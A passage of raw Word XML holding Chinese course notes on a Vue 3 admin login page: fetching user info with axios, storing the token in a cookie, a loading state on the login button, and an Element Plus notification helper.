    </w:p>
    <w:p w14:paraId="756F1DF5" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import axios from '~/axios'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DD30FF" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAD7D2E" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export function login(username, password){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA81FAF" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return axios.post('/admin/login', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D44B79" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13604510" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F464410" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADFE10" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF8AD84" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1525649E" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function getinfo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691B5B3" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return axios.post('/admin/getinfo')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585346DF" w14:textId="2EF465A0" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2C42A" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BC28FE" w14:textId="70524945" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将显示内容添加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D78C7" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0892DEC7" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0579252E" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1394019F" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // cookie.set('admin-token', res.data.data.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EF52C" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置响应拦截后使用下面代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E06C9B" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    cookie.set('admin-token', res.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3450E" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6D269E" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F50E5" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F1E55" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        .then(res2 =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB851C" w14:textId="77777777" w:rsidR="000F439B" w:rsidRPr="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            console.log(res2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEE6209" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F439B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633A518" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365181E8" w14:textId="77777777" w:rsidR="000F439B" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F68B2" w14:textId="6FF1623E" w:rsidR="00AD4E9E" w:rsidRDefault="000F439B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    router.push("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B05EFC" w14:textId="01C3423E" w:rsidR="00AD4E9E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按钮加载动作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338E016" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F96D1B" w14:textId="14399C6F" w:rsidR="00AD4E9E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这节知识在讲师将请求、响应拦截器的时候多加的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2F17E" w14:textId="49728809" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录时按钮处于加载状态，不能再点击，登录结果出来后再论能不能点击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C33209" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D34466E" w14:textId="2288D795" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>UE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE55D0D" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6DFCCF" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F886352" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-button round class="w-[250px]" type="primary" @click="onSubmit" </w:t>
      </w:r>
      <w:r w:rsidRPr="0071534E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:loading="loading"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB78BB" w14:textId="6E571D9F" w:rsidR="00AD4E9E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB36231" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DD3A42" w14:textId="2E5858DE" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B9744" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CADDDA" w14:textId="0D53D09A" w:rsidR="00AD4E9E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0071534E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const loading = ref(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADA4F9" w14:textId="77777777" w:rsidR="00AD4E9E" w:rsidRDefault="00AD4E9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378F2513" w14:textId="35CD2188" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281D540" w14:textId="1A3FF695" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.catch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DED5D6" w14:textId="22E36874" w:rsidR="0071534E" w:rsidRPr="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071534E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE478F" w14:textId="092AF812" w:rsidR="0071534E" w:rsidRPr="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071534E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      loading.value = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459EC7D0" w14:textId="507B7A6B" w:rsidR="00AD4E9E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0071534E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A848F26" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA1822C" w14:textId="73919600" w:rsidR="00954DB1" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果：按钮会处于“加载”的状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73C05A" w14:textId="40ECA5A3" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519B4517" wp14:editId="24556AA0">
            <wp:extent cx="2843684" cy="1588232"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1927565691"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65691" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2861941" cy="1598429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAED5A6" w14:textId="77777777" w:rsidR="0071534E" w:rsidRDefault="0071534E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7789FBE5" w14:textId="77777777" w:rsidR="002B2F97" w:rsidRDefault="002B2F97" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F7A703" w14:textId="0E4BD397" w:rsidR="00181907" w:rsidRPr="00FF4229" w:rsidRDefault="00181907" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="696" w:name="_Toc159780126"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用工具库封装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
    </w:p>
    <w:p w14:paraId="6F6EFB57" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAD1B4A" w14:textId="00FE7ABE" w:rsidR="00BF31AD" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>/composables/util.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD7877" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0867B5CF" w14:textId="6C4A4030" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB15BA">
        <w:t>src/composables/util.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工具类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D3217" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBA224A" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ElNotification } from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C23226" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0A974C" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B20FE" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function toast(message, type="success", duration=3000, dangerouslyUseHTMLString=false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D76B6" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8FCDB4" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        message: message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D344F6" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690971A6" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        duration: duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A59D6CE" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRPr="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCA1E6" w14:textId="53926D15" w:rsidR="00BF31AD" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBE15A" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B12E2B7" w14:textId="76D4595C" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中更改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF79CE5" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            login(form.username, form.password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4AEF87" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
